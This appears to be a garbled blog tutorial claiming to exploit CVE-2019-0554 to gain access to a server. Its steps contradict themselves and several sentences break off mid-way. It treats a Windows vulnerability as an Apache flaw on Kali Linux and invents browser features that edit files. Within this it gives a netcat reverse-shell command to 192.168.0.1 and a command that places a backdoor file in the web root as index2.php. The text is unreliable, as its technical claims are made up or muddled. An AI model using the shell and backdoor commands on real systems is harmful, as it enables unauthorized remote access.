In this blog, we are going to explain how to exploit the CVE-2019-0554 server service remote protocol elevation of privilege vulnerability in order to gain unauthorized access to the system. Before we start exploitation, we need a vulnerable server on which to test this vulnerability. For this, you can use the Kali Linux machine, which comes pre-installed with a vulnerable Apache server. We are assuming that you have installed Kali Linux on your system. If you don’t have it, you can download it from the link given at the end of the article.

Now connect your system to the internet and open the Google Chrome browser. Go to Type “vulnerable server” in the address bar and hit Enter. You will see a list of open ports on the vulnerable server. Now go to the exploit-db website, copy the URL and paste it in the search box. Then you have to choose “Remote Protocol”. A list of exploits will be displayed; choose the one mentioned above in the title and click on the “Run” button. The exploit will be executed on the vulnerable server and you will get the result. You will see the vulnerable port numbers and the details of the exploit.

Now that we have verified the exploit, we can move ahead to exploit it to get remote access to the server. Go to the vulnerable server and open a new tab in Google Chrome. Now open the exploit mentioned at the start of the article and copy the URL. Now open a

Steps to be taken to exploit the vulnerability

First, we need to create a reverse shell on the vulnerable server. Then we will start exploiting it. Now, to create a reverse shell, go to the command line and type “nc -e /bin/sh 192.168.0.1 3333” (without quotes). You can also try it with different IP addresses if you want. Now connect your Kali Linux machine to the vulnerable server using SSH and type “nc -e /bin/sh 192.168.0.1 3333” in the terminal of the Kali Linux machine as well, so that the reverse shell is listening for commands from there as well. Now, when you are connected to both machines, type “mv /tmp/reverse-shell-backdoor /var/www/html/index2.php” in the command line of the Kali Linux machine and hit Enter. After that, open a new tab in the Chrome browser on your system and go to the index2.php file mentioned above with your browser address bar and replace all occurrences of “backdoor” in the file with “index2” by right-clicking on index2.php and selecting the “Search Google for…” option from the context menu that appears after right-clicking on the index2.php file, which will search Google for this word and replace all occurrences of it with “index2” in this file only where you are online now so that it looks like

Step 1: Set up the Metasploitable Virtual Machine

If you are using the Kali Linux machine, then you can skip this step. If you want to use this exploit on your own system, then go ahead and set up the Metasploitable virtual machine according to the instructions given below.

Open VirtualBox and click on New. Then choose “Linux” as your operating system. Now enter the following details:
Name: Metasploitable
Version: Ubuntu 18.04 LTS
RAM: 128 MB
Hard drive size: 20GB
CPUs: 2

Create a new hard disk of type IDE (internal disk) in VirtualBox and select the maximum hard disk size that is available in your system. Now create a virtual machine with these specifications, launch it, and log in with username “root” and password “toor” as shown (note that in older versions of Ubuntu, you have to use sudo -i). Once logged in, install Apache2 by typing apt-get update && apt-get upgrade --yes at the terminal prompt, followed by apt-get install apache2 apache2-utils apache2-mpm-prefork -y. Now restart Apache by typing /etc/init.d/apache2 restart. After installation is done, open http://localhost/index.html in your browser to verify that everything is fine with

Timeline

Published on: 10/11/2022 19:15:00 UTC
Last modified on: 10/11/2022 19:16:00 UTC

References